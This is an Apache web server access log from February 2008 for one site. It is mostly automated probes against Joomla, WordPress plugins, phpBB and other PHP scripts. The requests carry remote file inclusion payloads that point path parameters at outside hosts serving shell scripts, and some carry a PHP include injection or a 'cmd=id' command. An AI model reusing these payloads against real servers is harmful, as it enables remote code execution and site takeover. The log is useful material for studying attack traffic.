82.66.124.141 - - [14/Feb/2008:06:24:34 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:06:24:35 -0800] "GET /logs/access.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:06:24:35 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:06:24:36 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:06:24:39 -0800] "GET /logs/access_080120.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:06:25:06 -0800] "GET /logs/access_080106.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:06:25:57 -0800] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:06:25:57 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:06:25:57 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [14/Feb/2008:06:26:06 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.hotellasamericas.com.co//cache/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:06:26:32 -0800] "GET /logs/access_080131.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.24.104 - - [14/Feb/2008:06:27:07 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:06:28:22 -0800] "GET //surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:06:28:22 -0800] "GET /logs//surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:06:29:02 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:06:29:02 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:06:29:02 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.85.186 - - [14/Feb/2008:06:29:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:06:29:55 -0800] "GET /logs//surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:06:29:55 -0800] "GET //surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:06:30:18 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:06:30:18 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:06:30:56 -0800] "GET //surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:06:30:57 -0800] "GET /logs//surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.9.235.98 - - [14/Feb/2008:06:31:57 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:06:31:57 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:06:32:12 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:06:35:05 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:35:30 -0800] "GET /logs/access_080130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:35:30 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:35:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:06:35:33 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.241.37 - - [14/Feb/2008:06:35:37 -0800] "GET /?mosConfig_absolute_path=http://www.91oven.com/uploads/test.txt? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.202.241.37 - - [14/Feb/2008:06:35:38 -0800] "GET /logs/?mosConfig_absolute_path=http://www.91oven.com/uploads/test.txt? HTTP/1.1" 200 34543 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
195.216.128.115 - - [14/Feb/2008:06:36:09 -0800] "GET /logs/access_071230.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.216.128.115 - - [14/Feb/2008:06:36:09 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.216.128.115 - - [14/Feb/2008:06:36:10 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:36:38 -0800] "GET /logs/access_080126.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:06:37:03 -0800] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:06:37:09 -0800] "GET //surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:06:37:09 -0800] "GET /logs//surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.216.56 - - [14/Feb/2008:06:37:39 -0800] "GET /index3.php?id=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.216.56 - - [14/Feb/2008:06:37:39 -0800] "GET /logs/index3.php?id=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:06:38:02 -0800] "GET //surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:06:38:03 -0800] "GET /logs//surveys/survey.inc.php?path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.10.219.245 - - [14/Feb/2008:06:38:26 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [14/Feb/2008:06:38:26 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [14/Feb/2008:06:38:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [14/Feb/2008:06:40:34 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:06:42:18 -0800] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:06:42:19 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:06:42:19 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:43:32 -0800] "GET /logs/access_080103.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:43:33 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:43:33 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:06:43:53 -0800] "GET /logs/access_080121.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:06:43:53 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:06:43:53 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.76 - - [14/Feb/2008:06:44:21 -0800] "GET /bikes/dteel/10MAR07/ HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.241.167.251 - - [14/Feb/2008:06:48:21 -0800] "GET /logs/access_071230.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.241.167.251 - - [14/Feb/2008:06:48:22 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.241.167.251 - - [14/Feb/2008:06:48:22 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:06:48:41 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:06:48:41 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:06:49:23 -0800] "GET /logs/access_080122.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.235.98 - - [14/Feb/2008:06:50:31 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.235.98 - - [14/Feb/2008:06:50:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.235.98 - - [14/Feb/2008:06:50:32 -0800] "GET /logs/access_080108.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:06:51:09 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.74 - - [14/Feb/2008:06:51:33 -0800] "GET /megumi/earrings/?M=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.15.27.248 - - [14/Feb/2008:06:51:49 -0800] "GET http://www.dmulk.com/logs/access_071123.log HTTP/1.0" 200 53071 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:52:21 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:52:22 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:52:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.155.107 - - [14/Feb/2008:06:52:45 -0800] "GET /logs/access_080201.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:06:53:17 -0800] "GET /logs/access_080201.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.7.232.34 - - [14/Feb/2008:06:54:51 -0800] "GET /logs/page.php?doc=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.7.232.34 - - [14/Feb/2008:06:54:52 -0800] "GET /page.php?doc=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:06:55:24 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.107.2 - - [14/Feb/2008:06:56:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.249.107.2 - - [14/Feb/2008:06:56:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.6.25.149 - - [14/Feb/2008:07:00:52 -0800] "GET /megumi/Bracelet/?N=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:07:00:54 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
77.232.66.107 - - [14/Feb/2008:07:00:54 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
198.87.87.17 - - [14/Feb/2008:07:02:18 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
198.87.87.17 - - [14/Feb/2008:07:02:18 -0800] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.195.44.108 - - [14/Feb/2008:07:04:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [14/Feb/2008:07:04:24 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:07:07:37 -0800] "GET /logs/access.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS%5BmosConfig_absolute_path%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:07:07:38 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS%5BmosConfig_absolute_path%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:07:07:38 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS%5BmosConfig_absolute_path%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:07:07:56 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:07:07:57 -0800] "GET /logs/access_080106.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS%5BmosConfig_absolute_path%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:07:07:57 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.236.97.62 - - [14/Feb/2008:07:11:57 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.103 - - [14/Feb/2008:07:12:00 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.75.242.174 - - [14/Feb/2008:07:12:26 -0800] "GET //login.php?dir=http://soeharto.cn/freeflow/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.249.107.2 - - [14/Feb/2008:07:13:05 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.249.107.2 - - [14/Feb/2008:07:13:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
201.55.48.7 - - [14/Feb/2008:07:14:04 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [14/Feb/2008:07:14:04 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [14/Feb/2008:07:14:05 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [14/Feb/2008:07:14:43 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.capsoir.com/images/cmd.txt?&cmd=id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:16:38 -0800] "GET /logs/access_080131.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
